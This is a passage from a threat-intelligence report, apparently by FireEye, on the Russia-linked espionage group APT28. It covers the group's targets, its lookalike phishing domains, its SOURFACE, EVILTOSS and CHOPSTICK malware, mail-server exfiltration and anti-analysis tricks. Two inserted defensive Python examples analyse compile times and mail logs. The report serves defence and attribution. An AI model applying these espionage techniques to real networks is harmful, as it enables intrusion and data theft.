   APT28 Malware Indicates Russian Speakers in a Russian Time Zone ... 25
   Compile Times Align with Working Hours in Moscow and St. Petersburg ... 27
CONCLUSION ... 28
APPENDIX A: DISTINGUISHING THREAT GROUPS ... 29
APPENDIX B: TIMELINE OF APT28 LURES ... 30
APPENDIX C: SOURFACE/CORESHELL ... 31
APPENDIX D: CHOPSTICK ... 35
APPENDIX E: OLDBAIT ... 43
EXECUTIVE SUMMARY

In this paper we discuss a threat group whose malware is already fairly well-known in the cybersecurity community. This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain. Nor have we observed the group steal and profit from financial account information.

The activity that we profile in this paper appears to be the work of a skilled team of developers and operators collecting intelligence on defense and geopolitical issues – intelligence that would only be useful to a government. We believe that this is an advanced persistent threat (APT) group engaged in espionage against political and military targets including the country of Georgia, Eastern European governments and militaries, and European security organizations since at least 2007. They compile malware samples with Russian language settings during working hours consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. While we don’t have pictures of a building, personas to reveal, or a government agency to name, what we do have is evidence of long-standing, focused operations that indicate a government sponsor – specifically, a government based in Moscow.

We are tracking this group as APT28.

Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has long been a whispered frontrunner among capable nations for performing sophisticated network operations. This perception is due in part to the Russian government’s alleged involvement in the cyber attacks accompanying its invasion of Georgia in 2008,[1] as well as the rampant speculation that Moscow was behind a major U.S. Department of Defense network compromise, also in 2008.[2] These rumored activities, combined with a dearth of hard evidence, have made Russia into something of a phantom in cyberspace.

[1] Markoff, John. “Before the Gunfire, Cyberattacks”. The New York Times, 12 August 2008. http://www.nytimes.com/2008/08/13/technology/13cyber.html
[2] Knowlton, Brian. “Military Computer Attack Confirmed”. The New York Times, 25 August 2010. http://www.nytimes.com/2010/08/26/technology/26cyber.html
KEY FINDINGS

GEORGIA: APT28 likely seeks to collect intelligence about Georgia’s security and political dynamics by targeting officials working for the Ministry of Internal Affairs and the Ministry of Defense.

EASTERN EUROPE: APT28 has demonstrated interest in Eastern European governments and security organizations. These victims would provide the Russian government with an ability to predict policymaker intentions and gauge its ability to influence public opinion.

SECURITY ORGANIZATIONS: APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe.

APT28 targets insider information related to governments, militaries, and security organizations that would likely benefit the Russian government.

• Malware compile times suggest that APT28 developers have consistently updated their tools over the last seven years.
• APT28 malware, in particular the family of modular backdoors that we call CHOPSTICK, indicates a formal code development environment. Such an environment would almost certainly be required to track and define the various modules that can be included in the backdoor at compile time.
• APT28 tailors implants for specific victim environments. They steal data by configuring their implants to send data out of the network using a victim network’s mail server.
• Several of APT28’s malware samples contain counter-analysis capabilities including runtime checks to identify an analysis environment, obfuscated strings unpacked at runtime, and the inclusion of unused machine instructions to slow analysis.

Indicators in APT28’s malware suggest that the group consists of Russian speakers operating during business hours in Russia’s major cities.

More than half of the malware samples with Portable Executable (PE) resources that we have attributed to APT28 included Russian language settings (as opposed to neutral or English settings), suggesting that a significant portion of APT28 malware was compiled in a Russian language build environment consistently over the course of six years (2007 to 2013).

Over 96% of the malware samples we have attributed to APT28 were compiled between Monday and Friday. More than 89% were compiled between 8AM and 6PM in the UTC+4 time zone, which parallels the working hours in Moscow and St. Petersburg. These samples had compile dates ranging from mid-2007 to September 2014.

Since 2007, APT28 has systematically evolved its malware, using flexible and lasting platforms indicative of plans for long-term use. The coding practices evident in the group’s malware suggest both a high level of skill and an interest in complicating reverse engineering efforts.
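The compile-time measurement behind the 96% and 89% figures is straightforward to reproduce for one’s own sample set. The Python below is an added example, not FireEye’s code: it reads the COFF TimeDateStamp directly out of PE headers with the standard library only and buckets the stamps by weekday and by local working hour for a chosen UTC offset. The sample PEs are constructed stubs carrying just the header fields the parser reads, and the stamps are invented. Two caveats matter in practice: Moscow kept UTC+4 year-round from 2011 until October 2014, which is the period the report covers, so the offset has to match the period being analysed; and TimeDateStamp is written by the linker and can be rewritten by the author, so a tight cluster is corroborating evidence, not proof.

```python
"""Profile PE compile timestamps by weekday and working hour in a chosen time zone.

Added example, not FireEye's code. It reproduces the kind of measurement the
report describes (share of samples compiled Mon-Fri, share compiled 08:00-18:00
in UTC+4) from raw PE headers using only the standard library. The sample PEs
below are constructed stubs that carry just the header fields this code reads.
"""
import struct
from datetime import datetime, timedelta, timezone


def pe_timestamp(data: bytes) -> int:
    """Return the COFF TimeDateStamp (seconds since 1970-01-01 UTC) of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF file header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def working_hours_profile(timestamps, utc_offset_hours=4, start_hour=8, end_hour=18):
    """Percentage of stamps on Mon-Fri and within [start_hour, end_hour) local time."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    weekday = in_hours = 0
    for ts in timestamps:
        local = datetime.fromtimestamp(ts, tz)
        if local.weekday() < 5:          # Monday=0 ... Friday=4
            weekday += 1
        if start_hour <= local.hour < end_hour:
            in_hours += 1
    n = len(timestamps)
    return {
        "samples": n,
        "weekday_pct": 100.0 * weekday / n,
        "workhours_pct": 100.0 * in_hours / n,
    }


def make_fake_pe(timestamp: int) -> bytes:
    """Constructed minimal MZ/PE stub: a DOS header pointing at a COFF header with the stamp."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHI", 0x014C, 3, timestamp)  # i386, 3 sections, stamp
    return bytes(dos) + coff


# Constructed sample set (invented stamps, written in UTC+4 so the intent is visible):
# four weekday stamps inside 08:00-18:00, one Saturday morning, one Tuesday evening.
_MSK_2014 = timezone(timedelta(hours=4))
SAMPLE_BLOBS = [
    make_fake_pe(int(datetime(*ymdhm, tzinfo=_MSK_2014).timestamp()))
    for ymdhm in [
        (2013, 6, 11, 10, 15),   # Tuesday, in hours
        (2012, 3, 14, 17, 30),   # Wednesday, in hours
        (2014, 9, 2, 9, 5),      # Tuesday, in hours
        (2011, 11, 18, 13, 45),  # Friday, in hours
        (2013, 6, 15, 11, 0),    # Saturday, in hours
        (2012, 3, 13, 22, 10),   # Tuesday, after hours
    ]
]


def analyze(blobs, utc_offset_hours=4):
    """Parse every blob and return the working-hours profile for the given offset."""
    return working_hours_profile([pe_timestamp(b) for b in blobs], utc_offset_hours)


if __name__ == "__main__":
    for offset in (4, -5):
        print(f"UTC{offset:+d}:", analyze(SAMPLE_BLOBS, offset))
```

Re-running the profile with a wrong offset (UTC-5 in the usage above) pushes most of the same stamps outside working hours; the clustering only appears under the offset the developers actually worked in, which is the contrast the report relies on. The PE resource language check mentioned alongside it requires walking the resource directory and is not shown here.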
APT28 TARGETING REFLECTS RUSSIAN INTERESTS

Many of APT28’s targets align generally with interests that are typical of any government. However, three themes in APT28’s targeting clearly reflect areas of specific interest to an Eastern European government, most likely the Russian government. These include the Caucasus (especially the Georgian government), Eastern European governments and militaries, and specific security organizations.

APT28 uses spearphishing emails to target its victims, a common tactic in which the threat group crafts its emails to mention specific topics (lures) relevant to recipients. This increases the likelihood that recipients will believe that the email is legitimate and will be interested in opening the message, opening any attached files, or clicking on a link in the body of the email. Since spearphishing lures are tailored to the recipients whose accounts APT28 hopes to breach, the subjects of the lures provide clues as to APT28’s targets and interests. For example, if the group’s lures repeatedly refer to the Caucasus, then this most likely indicates that APT28 is trying to gain access to the accounts of individuals whose work pertains to the Caucasus. Similarly, APT28’s practice of registering domains that mimic those of legitimate news, politics, or other websites indicates topics that are relevant to APT28’s targets.

We identified three themes in APT28’s lures and registered domains, which together are particularly relevant to the Russian government. In addition to these themes, we have seen APT28 target a range of political and military organizations. We assess that the work of these organizations serves nation state governments.

APT28: Three Themes
• The Caucasus, particularly the country of Georgia
• Eastern European governments and militaries
• The North Atlantic Treaty Organization (NATO) and other European security organizations
APT28 INTEREST IN THE CAUCASUS, PARTICULARLY GEORGIA

The Caucasus, a region that includes Chechnya and other Russian republics and the independent states of Georgia, Armenia, and Azerbaijan, continues to experience political unrest. The Georgian government’s posture and ties to the West are a frequent source of Moscow’s frustration, particularly after the 2008 war. Overall, issues in the Caucasus likely serve as focal points for Russian intelligence collection efforts.

Since 2011, APT28 has used lures written in Georgian that are probably intended to target Georgian government agencies or citizens. APT28 is likely seeking information on Georgia’s security and diplomatic postures. Specifically, the group has targeted the Georgian Ministry of Internal Affairs (MIA) and the Ministry of Defense (MOD). We also observed efforts to target a journalist working on issues in the Caucasus and a controversial Chechen news site.

[Map of the Caucasus: Russia (Chechnya), Georgia (Abkhazia, Tbilisi), Turkey, Armenia (Yerevan, Armenian Military), Azerbaijan, with the Kavkaz Center marked.]
APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)

The MIA harbors sensitive information about the inner workings of Georgia’s security operations, the country’s engagement in multilateral institutions, and the government’s communications backbone. It is responsible for:[3]
• Policing, internal security, and border patrols
• Counterintelligence
• Counterterrorism
• International relations
• Defense of Georgia’s strategic facilities and assets
• “Operative-Technical” tasks

APT28 made at least two specific attempts to target the MIA. In one case, we identified an APT28 lure from mid-2013 that referenced MIA-related topics and employed malware that attempted to disguise its activity as legitimate MIA email traffic. The lure consisted of a weaponized Excel file that presented a decoy document containing a list of Georgian driver’s license numbers. The backdoor attempted to establish a connection to a Georgian MIA mail server and communicate via MIA email addresses ending with “@mia.ge.gov”. Once connected to the mail server, APT28’s backdoor sent an email message using a subject line related to driver’s licenses (in Georgian), and attached a file containing system reconnaissance information. This tactic could allow APT28 to obtain data from the MIA’s network through a less-monitored route, limiting the MIA network security department’s abilities to detect the traffic.

In the second example of MIA targeting, an APT28 lure used an information technology-themed decoy document that included references to the Windows domain “MIA UsersOrtachala…” (Figure 1). This probably referred to the MIA facility in the Ortachala district of Tbilisi, Georgia’s capital city. The decoy document also contains metadata listing “MIA” as the company name and “Beka Nozadze”[4] as an author, a possible reference to a system administrator in Tbilisi. The text of the document purports to provide domain and user group setup information for internal Windows XP and Windows 7 systems. APT28 possibly crafted this document to appear legitimate to all MIA system users and intended to breach the MIA network specifically using the embedded malware.

Figure 1: Georgian MIA-related decoy

[3] Georgian Ministry of Internal Affairs website, http://police.ge/en/home
[4] Queries on the author yielded a LinkedIn page for a person of the same name who serves as a system administrator in Tbilisi.
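The first MIA case describes exfiltration through the victim’s own mail server: the implant connected to the MIA mail server, used MIA addresses, and mailed a reconnaissance file under a plausible Georgian subject line. As an added example that is not from the report, the Python below shows one mail-side check a defender could run over submission logs: learn which client hosts normally submit mail for each sender address, then flag a message that uses an address from an unfamiliar host and carries an attachment, recording whether the recipient is outside the organization. The log line format, the hosts, the addresses and the domain mia.example are all constructed for the example; nothing here is taken from the actual MIA incident.

```python
"""Flag mail submissions that look like exfiltration through the victim's own mail server.

Added example, not FireEye's code. Heuristic: learn which client hosts normally
submit mail for each sender address, then flag a message that uses an address
from an unfamiliar host and carries an attachment. Log format, hosts, addresses
and the domain mia.example are constructed for this example.
"""
import re
from collections import defaultdict

ORG_DOMAIN = "mia.example"   # constructed stand-in for the victim organization's mail domain

# Constructed submission-log format: one line per accepted message.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) client=(?P<client>\S+) from=(?P<sender>\S+) '
    r'to=(?P<rcpt>\S+) attach=(?P<attach>\d+) subject="(?P<subject>[^"]*)"$'
)


def parse(line):
    """Parse one constructed log line into a dict; 'attach' becomes an int."""
    m = LOG_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ev = m.groupdict()
    ev["attach"] = int(ev["attach"])
    return ev


def is_external(addr, org_domain=ORG_DOMAIN):
    """True when the address is not in the organization's own domain."""
    return not addr.lower().endswith("@" + org_domain)


def learn_baseline(lines):
    """Map each internal sender address to the set of client hosts it was submitted from."""
    seen = defaultdict(set)
    for ev in map(parse, lines):
        if not is_external(ev["sender"]):
            seen[ev["sender"]].add(ev["client"])
    return seen


def find_suspicious(lines, baseline, org_domain=ORG_DOMAIN):
    """Internal sender + unfamiliar submitting host + attachment. Adds 'external_rcpt' to hits."""
    hits = []
    for ev in map(parse, lines):
        if is_external(ev["sender"], org_domain):
            continue                 # inbound mail from outside; not what this check is for
        unfamiliar = ev["client"] not in baseline.get(ev["sender"], set())
        if unfamiliar and ev["attach"] > 0:
            ev["external_rcpt"] = is_external(ev["rcpt"], org_domain)
            hits.append(ev)
    return hits


BASELINE_LOG = [  # constructed: a few days of normal submissions
    '2013-06-03T09:12:04 client=10.20.30.41 from=ops.desk@mia.example to=it.helpdesk@mia.example attach=0 subject="weekly report"',
    '2013-06-04T14:30:11 client=10.20.30.41 from=ops.desk@mia.example to=partner@ministry.example attach=1 subject="agenda"',
    '2013-06-05T08:55:40 client=10.20.30.77 from=it.helpdesk@mia.example to=ops.desk@mia.example attach=1 subject="domain setup"',
]

NEW_LOG = [  # constructed: the day the lure is opened
    '2013-06-11T10:15:22 client=10.20.30.41 from=ops.desk@mia.example to=it.helpdesk@mia.example attach=1 subject="driver licenses"',
    '2013-06-11T10:16:03 client=10.20.30.150 from=ops.desk@mia.example to=it.helpdesk@mia.example attach=1 subject="driver licenses"',
    '2013-06-11T10:20:45 client=10.20.30.150 from=ops.desk@mia.example to=it.helpdesk@mia.example attach=0 subject="re: meeting"',
    '2013-06-11T11:02:09 client=203.0.113.9 from=news@outside.example to=ops.desk@mia.example attach=1 subject="newsletter"',
]


if __name__ == "__main__":
    for hit in find_suspicious(NEW_LOG, learn_baseline(BASELINE_LOG)):
        where = "external" if hit["external_rcpt"] else "internal"
        print(hit["ts"], hit["client"], hit["sender"], "->", hit["rcpt"], f'"{hit["subject"]}"', where)
```

Only the second line of the constructed day fires: the same internal address, the same subject, but submitted from a host that address has never used, with an attachment. A freshly imaged workstation or a user at a colleague’s desk will trigger the same rule, so a hit is a triage lead to pair with the submitting host’s process list, not a verdict. The point the report makes still holds: mail leaving through the sanctioned server is only a less-monitored route if nobody looks at who is submitting it.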
APT28 Targeting of the Georgian Ministry of Defense

APT28 also appeared to target Georgia’s MOD along with a U.S. defense contractor that was training the Georgian military. APT28 used a lure document that installed a SOURFACE downloader (further discussed in the Malware section) and contained a listing of birthdays for members of a working group between the Georgian MOD and the U.S. defense contractor. The U.S. contractor was involved in a working group to advise the MOD and Georgian Armed Forces, assess Georgia’s military capabilities, and develop a military training program for the country.

We believe that APT28’s targeting of the MOD aligns with Russian threat perceptions. The growing U.S.-Georgian military relationship has been a source of angst for Russia. Georgia and Russia severed diplomatic relations following the Russia-Georgia War in 2008, and Georgia has since sought to align itself more closely with western security organizations. Additionally, in June 2014, despite Russia’s vocal objections, Georgia, along with Ukraine and Moldova, signed association accords with the EU.[5] This move placed all three countries more firmly in the EU’s political, economic, and security spheres of influence. Georgian military security issues, particularly with regard to U.S. cooperation and NATO, provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics.

[5] “The EU’s Association Agreements with Georgia, the Republic of Moldova and Ukraine”. European Union Press Release Database, 23 June 2014. http://europa.eu/rapid/press-release_MEMO-14-430_en.htm

APT28 Targeting a Journalist Covering the Caucasus

Another one of APT28’s lures appeared to target a specific journalist covering issues in the Caucasus region. In late 2013, APT28 used a lure that contained a letter addressing a journalist by his first name and claiming to originate from a “Chief Coordinator” in Reason Magazine’s “Caucasian Issues Department”, a division that does not appear to exist.[6] (Reason Magazine is a US-based magazine.) The letter welcomed the individual as a contributor and requested topic ideas and identification information in order to establish him at the magazine. In the background, the decoy document installed a SOURFACE backdoor on the victim’s system.

Figure 2: Excerpt of APT28’s letter to a journalist writing on Caucasus-related issues

    We wish our cooperation will be both profitable and trusted. Our aim in the Caucasian region is to help people who struggle for their independence, liberty and human rights. We all know, that world is often unfair and cruel, but all together we can make it better.
    Send your articles on this email – in Russian or English, please. There are some difficulties with Caucasian languages, but we’ll solve the problem pretty soon, I hope.

The body of the letter suggests that APT28 actors are able to read at least two languages – Russian and English. The grammar of the letter also indicates that English is not the author’s first language, despite it purportedly originating from a US-based magazine. This implies that Russian may be the APT28 author’s preferred language.

Targeting journalists could provide APT28 and its sponsors with a way to monitor public opinion, identify dissidents, spread disinformation, or facilitate further targeting. Several other nation states are suspected of targeting journalists and dissidents to monitor their activity, including China and Iran.[7][8] Journalists in the Caucasus working on Caucasus independence issues would be a prime target for intelligence collection for Moscow. Journalists critical of the Kremlin have long been targets of surveillance and harassment, and a number of governments and human rights organizations have publicly criticized the government for its treatment of journalists and its increasing consolidation of control over the media.[9]

[6] We attempted to identify candidate journalists in the country. One of these was a Georgian national of Chechen descent, whose work appears to center on Chechen and human rights issues. Ultimately, however, we cannot confirm the identity of the target(s).
APT28’s Other Targets in the Caucasus

We have seen APT28 register at least two domains mimicking the domains of legitimate organizations in the Caucasus, as shown in Table 1. One APT28 domain imitated a key Chechen-focused news website, while the other appeared to target members of the Armenian military by hosting a fake login page.

Of particular note, the Kavkaz Center is a Chechen-run website designed to present an alternative view to the long-running conflict between Russia and Chechen separatists. In 2004[10] and 2013,[11] Russia’s Foreign Minister voiced his displeasure that a Swedish company continues to host the Kavkaz Center website.

Table 1: Examples of APT28 domains imitating organizations in the Caucasus

APT28 Domain       | Real Domain
kavkazcentr[.]info | The Kavkaz Center / The Caucasus Center, an international Islamic news agency with coverage of Islamic issues, particularly Russia and Chechnya (kavkazcenter.com)
rnil[.]am          | Armenian military (mil.am)

[7] Moran, Ned; Villeneuve, Nart; Haq, Thoufique; and Scott, Mike. “Operation Saffron Rose”. FireEye, 13 May 2014. http://www.fireeye.com/blog/technical/malware-research/2014/05/operation-saffron-rose.html
[8] The New York Times publicly disclosed their breach by APT12, which they assess was motivated by the China-based actors’ need to know what the newspaper was publishing about a controversial topic related to corruption and the Chinese Communist Party’s leadership.
[9] “Russia”. Freedom House Press Release, 2013. http://www.freedomhouse.org/report/freedom-press/2013/russia#.VD8fe9R4rew
[10] “Chechen website promotes terror: Lavrov”. UPI, 16 November 2004. http://www.upi.com/Top_News/2004/11/16/Chechen-website-promotes-terror-Lavrov/UPI-11601100627922/
[11] “Lavrov urges Sweden to ban Chechen website server”. The Voice of Russia, 15 May 2013. http://voiceofrussia.com/news/2013_05_15/Lavrov-urges-Sweden-to-ban-Chechen-website-server/
APT28 TARGETING OF EASTERN EUROPEAN GOVERNMENTS AND MILITARIES

Eastern European countries’ political and military postures are traditionally core Russian government interests. The Kremlin has long regarded the former Soviet Republics and satellite states as in its sphere of economic, political, and military interest. Over the past two decades, as many of these states joined NATO and the EU, Russia has attempted to regain its influence in the region. Many of APT28’s targets parallel this continued focus on Eastern European governments and militaries.

APT28 Targets Eastern European Government Organizations

We have evidence that APT28 made at least two attempts to compromise Eastern European government organizations:
• In a late 2013 incident, a FireEye device deployed at an Eastern European Ministry of Foreign Affairs detected APT28 malware in the client’s network.
• More recently, in August 2014 APT28 used a lure (Figure 3) about hostilities surrounding a Malaysia Airlines flight downed in Ukraine in a probable attempt to compromise the Polish government. A SOURFACE sample employed in the same Malaysia Airlines lure was referenced by a Polish computer security company in a blog post.[12] The Polish security company indicated that the sample was “sent to the government,” presumably the Polish government, given the company’s location and visibility.

Figure 3: Decoy MH17 document probably sent to the Polish government

APT28 has registered domains similar to those of legitimate Eastern European news sites and governments, listed in Table 2. These domain registrations not only suggest that APT28 is interested in Eastern European political affairs, but also that the group targets Eastern European governments directly.

In addition, APT28 used one domain for command and control sessions (baltichost[.]org) that was themed after the Baltic Host exercises. Baltic Host is a multinational logistics planning exercise, hosted annually since 2009 by one of the three Baltic States (Estonia, Latvia, and Lithuania, all three of which are on Russia’s border) on a rotational basis. In June 2014, this event was integrated with a larger U.S. Army training event, and focused on exercises to improve interoperability with regional allies and partners.[13][14]

This domain registration suggests that APT28 sought to target individuals either participating in the exercises or interested in Baltic military and security matters. Such targets would potentially provide APT28 with sensitive tactical and strategic intelligence concerning regional military capabilities and relationships. These exercises are a particular point of interest in Moscow: pro-Kremlin press cited Russia’s interpretation of these military exercises and NATO’s involvement as a “sign of aggression,” and Russia’s Foreign Minister publicly stated that the exercise was “a demonstration of hostile intention.”[15]

Table 2: Examples of APT28 domains imitating legitimate Eastern European organization names

APT28 Domain                    | Real Domain
standartnevvs[.]com             | Bulgarian Standart News website (standartnews.com)
novinitie[.]com, n0vinite[.]com | Bulgarian Sofia News Agency website (novinite.com)
qov[.]hu[.]com                  | Hungarian government domain (gov.hu)
q0v[.]pl, mail[.]q0v[.]pl       | Polish government domain (gov.pl) and mail server domain (mail.gov.pl)
poczta.mon[.]q0v[.]pl           | Polish Ministry of Defense mail server domain (poczta.mon.gov.pl)

[12] “MHT, MS12-27 Oraz *malware*.info”. 11 August 2014. http://malware.prevenity.com/2014/08/malware-info.html
[13] “Saber Strike and Baltic Host kick off in Latvia, Lithuania and Estonia”. Estonian Defense Forces, 9 June 2014 (accessed 11 June 2014). http://www.mil.ee/en/news/8251/saber-strike-and-baltic-host-kick-off-in-latvia,-lithuania-and-estonia
[14] “Baltic Host 2014 rendering host nation support for the training audience of Exercise Saber Strike 2014 and repelling faked cyber-attacks”. Republic of Lithuania Ministry of National Defense, 12 June 2014. http://www.kam.lt/en/news_1098/current_issues/baltic_host_2014_rendering_host_nation_support_for_the_training_audience_of_exercise_saber_strike_2014_and_repelling_faked_cyber-attacks.html
[15] “Tanks, troops, jets: NATO countries launch full-scale war games in Baltic”. Russia Today, 9 June 2014. http://rt.com/news/164772-saber-strike-exercise-nato/
APT28 TARGETING OF NATO AND OTHER EUROPEAN SECURITY ORGANIZATIONS

APT28’s lures and domain registrations also demonstrate their interest in NATO and other European security organizations. NATO remains a chief Russian adversary, or in the words of Russia’s 2010 military doctrine, a “main external military danger” particularly as it moves “closer to the borders of the Russian Federation.”[16] As the traditional western counterweight to the Soviet Union, Russia regards NATO, particularly NATO’s eastward expansion, as a threat to Russia’s strategic stability. APT28 also registered a domain name imitating the Organization for Security and Cooperation in Europe (OSCE), an intergovernmental organization that has cited widespread fraud in numerous Russian state elections. Insider information about NATO, the OSCE and other security organizations would inform Russian political and military policy.

Several of the domains APT28 registered imitated NATO domain names, including those of NATO Special Operations Headquarters and the NATO Future Forces Exhibition. We also observed a user that we suspect works for NATO HQ submit an APT28 sample to VirusTotal, probably as a result of receiving a suspicious email.

Table 3: Examples of APT28 domains imitating legitimate NATO and security websites

APT28 Domain             | Real Domain
nato.nshq[.]in           | NATO Special Operations Headquarters (nshq.nato.int)
natoexhibitionff14[.]com | NATO Future Forces 2014 Exhibition & Conference (natoexhibition.org)
login-osce[.]org         | Organization for Security and Cooperation in Europe (osce.org)

APT28 also demonstrated an interest in defense attachés working in European countries. We identified an APT28 lure containing a decoy document with a list of British officers and U.S. and Canadian military attachés in London.

Finally, APT28 used a lure that contained an apparent non-public listing of contact information for defense attachés in the “Ankara Military Attaché Corps (AMAC),” which appears to be a professional organization of defense attachés in Turkey (Figure 5).

Figure 4: Decoy document used against military attachés in 2012
Figure 5: Ankara Military Attaché Corps decoy document

[16] The Military Doctrine of the Russian Federation, approved by Presidential edict on 5 February 2010.
APT28 Targets European
Defense Exhibitions
In addition to targeting European security
organizations and governments, it appears that
APT28 is targeting attendees of European
defense exhibitions. Some of the APT28-
registered domains imitated those of defense
events held in Europe, such as the Farnborough
Airshow 2014, EuroNaval 2014, EUROSATORY
2014, and the Counter Terror Expo. In September
2014, APT28 registered a domain (smigroup-
online.co[.]uk) that appeared to mimic that for the
SMi Group, a company that plans events for the
“Defence, Security, Energy, Utilities, Finance and
Pharmaceutical sectors.” Among other events, the
SMi Group is currently planning a military satellite
communications event for November 2014.
Targeting organizations and professionals
involved in these defense events would likely
provide APT28 with an opportunity to procure
intelligence pertaining to new defense
technologies, as well as the victim organizations’
operations, communications, and future plans.
APT28 has targeted a variety of organizations
that fall outside of the three themes we
highlighted above. However, we are not
profiling all of APT28’s targets with the same
detail because they are not particularly indicative
of a specific sponsor’s interests. They do indicate
parallel areas of interest to many governments
and do not run counter to Russian state interests.
Other probable APT28 targets that we have
identified:
• Norwegian Army (Forsvaret)
• Government of Mexico
• Chilean Military
• Pakistani Navy
• U.S. Defense Contractors
• European Embassy in Iraq
• Special Operations Forces Exhibition (SOFEX) in Jordan
• Defense Attaches in East Asia
• Asia-Pacific Economic Cooperation (APEC)
• Al-Wayi News Site
OTHER APT28 TARGETS ARE CONSISTENT WITH NATION STATE INTERESTS
Map of APT28 targets (figure). Key: APT28 Registered Domains; Lure Document; Phishing Email. International organizations: European Commission; UN Office for the Coordination of Humanitarian Affairs; APEC; NATO; OSCE; World Bank. Other: Hizb ut-Tahir; Chechnya Global Diplomatic Forum; Military Trade Shows. Map labels: US defense attachés and US defense contractors; Mexican government; Canadian defense attachés; Chilean military; defense attachés in Turkey; Afghan news website; Pakistani military; Iranian academics; European embassy in Iraq; Emirati news website; defense attachés in China; defense attachés in South Korea; defense attachés in Japan; Hungarian government; UK defense attachés; Norwegian military.
APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS
APT28’s tools are suggestive of the group’s skills, ambitions, and identity. Our analysis of some of the group’s more commonly used tools indicates that APT28 has been systematically updating their tools since 2007.
APT28 is most likely supported by a group of
developers creating tools intended for long-term
use and versatility, who make an effort to
obfuscate their activity. This suggests that APT28
receives direct ongoing financial and other
resources from a well-established organization,
most likely a nation state government. APT28’s
malware settings suggest that the developers
have done the majority of their work in a Russian
language build environment during Russian
business hours, which suggests that the Russian
government is APT28’s sponsor.
Some of APT28’s more commonly used tools are
the SOURFACE downloader, its second stage
backdoor EVILTOSS, and a modular family of
implants that we call CHOPSTICK.
• SOURFACE: This downloader is typically
called Sofacy within the cyber security
community. However because we have
observed the name “Sofacy” used to refer to
APT28 malware generally (to include the
SOURFACE dropper, EVILTOSS,
CHOPSTICK, and the credential harvester
OLDBAIT), we are using the name
SOURFACE to precisely refer to a specific
downloader. This downloader obtains a
second-stage backdoor from a C2 server.
CORESHELL is an updated version of
SOURFACE.
• EVILTOSS: This backdoor has been delivered
through the SOURFACE downloader to gain
system access for reconnaissance,
monitoring, credential theft, and shellcode
execution.
• CHOPSTICK: This is a modular implant
compiled from a software framework that
provides tailored functionality and flexibility.
A number of the malware variants that we profile
below, especially the CHOPSTICK family,
demonstrate formal coding practices indicative of
methodical, diligent programmers. The modularity
of CHOPSTICK alone, with its flexible and lasting
platform, demonstrates planning for long-term
use and versatility. We have also noted that
APT28 tailors implants to their target
environments, configuring them to use local
network resources such as email servers.
APT28 has attempted to obfuscate their code and
implement counter-analysis techniques:
Figure 6: Typical deployment of SOURFACE ecosystem (spearphishing email → document with exploit → dropper malware → SOURFACE downloader, which obtains the 2nd stage from the C2 server and deploys 2nd stage droppers → 2nd stage implant)
• One of the latest samples of CORESHELL
includes counter-reverse engineering tactics
via unused machine instructions. This would
hinder static analysis of CORESHELL behavior
by creating a large amount of unnecessary
noise in the disassembly.
• A number of CORESHELL droppers also
conduct runtime checks, attempting to
determine if they are executing in an analysis
environment, and if so, they do not trigger
their payloads.
• Many samples across the SOURFACE/CORESHELL, CHOPSTICK, and EVILTOSS malware families obfuscate strings that are
decoded at runtime. Two of the malware
families (SOURFACE/CORESHELL and
EVILTOSS) use the same decryption
sequence and similar algorithms for string
encoding and decoding. These families
encode their strings at compile time using a
custom stream cipher. From a high level,
these ciphers share a similar design across
the malware families but differ slightly in the
internal arithmetic operations.
• APT28 has employed RSA encryption to
protect files and stolen information moved
from the victim’s network to the controller.
APT28 has made incremental and systematic
changes to the SOURFACE downloader and its
surrounding ecosystem since as early as 2007.
These changes indicate a long-standing and
dedicated development effort behind APT28. We
have observed samples of the SOURFACE
downloader compiled between 2007 and 2014.
We call SOURFACE (samples are frequently
named netids.dll) a first stage downloader
because its primary job is to retrieve a second
stage payload from a C2 server. Until 2013, the
SOURFACE downloader used hard-coded IP
addresses for C2 communications, whereas the
future CORESHELL samples use domains.
EVOLUTION OF SOURFACE ECOSYSTEM INDICATES SYSTEMATIC DEVELOPMENT
WHAT IS A MALWARE ECOSYSTEM?
First, a malware family is a collection of malware in which each sample shares a significant amount of code with all of the others. There are exceptions: for example, some files contain public and standard code libraries that we do not take into consideration when making a family determination.
A malware ecosystem is a group of malware families that work together to perform the same objective. Perhaps the simplest and most typical ecosystem is a dropper and a backdoor that are used together. They may not share the same code structure, but they are related because one drops and installs the other.
The ecosystem surrounding the SOURFACE downloader frequently consists of a dropper, which installs SOURFACE. The SOURFACE downloader then receives another dropper from its C2 server, and this second dropper installs a second stage backdoor, which is usually EVILTOSS.
In April 2013, based on compile time, the group
began to make significant alterations to the
SOURFACE downloader. They started by
changing the compiled DLL name to “coreshell.dll”
and making minor changes to the network
communications, as seen in Figure 7.
The hostname, volume serial number and OS
version data are encoded in the new URL format.
As seen in the table below, the SOURFACE/
CORESHELL developers also made other
modifications that changed the exported function
name and file size over time.
Table 4: Evolution of SOURFACE downloader over time
MD5 | Size | Compile Date (UTC) | Export Name | Notes
272f0fde35dbdfccbca1e33373b3570d | 11264 | 2013-04-16 10:49:25 | Init1 | 17
8b92fe86c5b7a9e34f433a6fbac8bc3a | 14848 | 2013-08-06 07:53:03 | Initialize | 18
9eebfebe3987fec3c395594dc57a0c4c | 12800 | 2013-08-14 10:48:59 | Initialize | 19
da2a657dc69d7320f2ffc87013f257ad | 12800 | 2013-08-21 07:52:10 | Initialize | Same as previous.
1259c4fe5efd9bf07fc4c78466f2dd09 | 12800 | 2013-10-03 09:21:10 | Initialize | Same as previous.
